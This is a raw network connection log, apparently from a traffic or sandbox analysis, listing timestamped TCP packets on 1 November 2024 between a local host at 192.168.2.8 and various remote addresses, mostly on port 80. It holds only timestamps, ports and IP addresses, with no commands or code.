                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:39.835472107 CET5626980192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:39.835505962 CET5626980192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:39.840281010 CET805626918.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:39.840291023 CET805626918.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:40.211587906 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:40.252362013 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:40.503885031 CET805626918.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:40.506833076 CET5626980192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:40.512087107 CET805626918.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:40.512139082 CET5626980192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:40.578193903 CET5627080192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:40.583163977 CET8056270208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:40.583234072 CET5627080192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:40.629687071 CET5627080192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:40.629728079 CET5627080192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:40.634686947 CET8056270208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:40.634701014 CET8056270208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:41.419790030 CET8056270208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:41.441468000 CET8056270208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:41.446044922 CET5627080192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:41.515369892 CET5627080192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:41.515369892 CET5627080192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:41.520317078 CET8056270208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:41.520335913 CET8056270208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:41.662123919 CET8056270208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:41.716825962 CET5627180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:41.721127033 CET5627080192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:41.721688986 CET805627113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:41.721761942 CET5627180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:41.722059965 CET5627180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:41.722060919 CET5627180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:41.726913929 CET805627113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:41.726924896 CET805627113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:42.096410990 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:42.101478100 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:42.175122023 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:42.180248976 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:42.366975069 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:42.387927055 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:42.392808914 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:42.516223907 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:42.517884016 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:42.522941113 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:42.690197945 CET5627080192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:42.695687056 CET8056270208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:42.695733070 CET5627080192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.151262045 CET805627113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.153007030 CET5627180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.158288956 CET805627113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.158420086 CET5627180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.259157896 CET5627280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.263993979 CET805627244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.264182091 CET5627280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.264606953 CET5627280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.264606953 CET5627280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.269454002 CET805627244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.269464016 CET805627244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.960407019 CET805627244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.981031895 CET5627280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.986391068 CET805627244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.986428022 CET5627280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:44.390685081 CET5627380192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:44.395636082 CET805627354.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:44.395698071 CET5627380192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:44.400619030 CET5627380192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:44.400749922 CET5627380192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:44.405431986 CET805627354.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:44.405539036 CET805627354.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.213447094 CET805627354.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.213671923 CET5627380192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.218936920 CET805627354.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.219069958 CET5627380192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.231750965 CET5627480192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.236746073 CET805627435.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.236841917 CET5627480192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.237193108 CET5627480192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.237371922 CET5627480192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.241975069 CET805627435.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.242136955 CET805627435.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.080709934 CET805627435.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.080890894 CET5627480192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.086222887 CET805627435.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.086286068 CET5627480192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.095251083 CET5627580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.100199938 CET80562753.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.100276947 CET5627580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.100435972 CET5627580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.100544930 CET5627580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.105189085 CET80562753.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.105360985 CET80562753.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.760648966 CET80562753.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.760799885 CET5627580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.765935898 CET80562753.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.765985966 CET5627580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.775178909 CET5627680192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.780050993 CET8056276165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.780107975 CET5627680192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.780239105 CET5627680192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.780261993 CET5627680192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.785003901 CET8056276165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.785012960 CET8056276165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.487175941 CET8056276165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.489104986 CET5627680192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.489104986 CET5627680192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.494013071 CET8056276165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.494060040 CET8056276165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.666336060 CET8056276165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.686037064 CET5627780192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.690953016 CET805627754.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.691059113 CET5627780192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.691231012 CET5627780192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.691231012 CET5627780192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.696041107 CET805627754.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.696053982 CET805627754.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.697906971 CET805626882.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.698014975 CET5626880192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.698226929 CET5626880192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.703063965 CET805626882.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.713093996 CET5627880192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.718051910 CET805627847.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.718213081 CET5627880192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.718379021 CET5627880192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.718379974 CET5627880192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.723212957 CET805627847.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.723223925 CET805627847.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.825608015 CET5627680192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:48.528323889 CET805627754.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:48.528460979 CET5627780192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:48.533807039 CET805627754.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:48.533859968 CET5627780192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:48.542733908 CET5627980192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:48.548057079 CET8056279208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:48.548146009 CET5627980192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:48.548255920 CET5627980192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:48.548285961 CET5627980192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:48.553035975 CET8056279208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:48.553047895 CET8056279208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.183775902 CET805627847.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.184078932 CET5627880192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.189656019 CET805627847.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.189744949 CET5627880192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.197545052 CET8056279208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.200196028 CET5628080192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.201304913 CET5627980192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.201400042 CET5627980192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.205140114 CET805628013.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.205228090 CET5628080192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.205923080 CET5628080192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.206063032 CET5628080192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.206120968 CET8056279208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.206324100 CET8056279208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.210891008 CET805628013.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.210911036 CET805628013.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.349033117 CET8056279208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.457760096 CET5628180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.462728024 CET805628134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.462800980 CET5628180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.462960958 CET5628180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.463191986 CET5628180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.468080044 CET805628134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.468092918 CET805628134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.533900023 CET5627980192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.288516045 CET805628134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.288992882 CET5628180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.294440031 CET805628134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.294562101 CET5628180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.310261965 CET5628280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.315237999 CET805628254.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.315299034 CET5628280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.315445900 CET5628280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.315486908 CET5628280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.320300102 CET805628254.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.320310116 CET805628254.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.632181883 CET805628013.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.632373095 CET5628080192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.637654066 CET805628013.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.637710094 CET5628080192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.649955034 CET5628380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.654839039 CET805628344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.654911041 CET5628380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.655047894 CET5628380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.655103922 CET5628380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.660002947 CET805628344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.660056114 CET805628344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.135039091 CET805628254.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.136984110 CET5628280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.142287016 CET805628254.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.142430067 CET5628280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.153114080 CET5628480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.158179045 CET805628418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.158276081 CET5628480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.158546925 CET5628480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.158718109 CET5628480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.163593054 CET805628418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.163613081 CET805628418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.205813885 CET5628380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.211735010 CET5628580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.216949940 CET805628544.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.217179060 CET5628580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.217179060 CET5628580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.217221975 CET5628580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.222040892 CET805628544.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.222446918 CET805628544.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.889739990 CET805628544.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.889969110 CET5628580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.895287991 CET805628544.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.895361900 CET5628580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.904894114 CET5628680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.909827948 CET805628618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.909899950 CET5628680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.910161018 CET5628680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.910218954 CET5628680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.915045023 CET805628618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.915273905 CET805628618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.577403069 CET805628418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.577562094 CET5628480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.582756042 CET805628418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.582839012 CET5628480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.594235897 CET5628780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.600053072 CET805628718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.600117922 CET5628780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.600277901 CET5628780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.600327969 CET5628780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.605171919 CET805628718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.605180979 CET805628718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.261377096 CET805628718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.261583090 CET5628780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.268379927 CET805628718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.268449068 CET5628780192.168.2.818.208.156.248
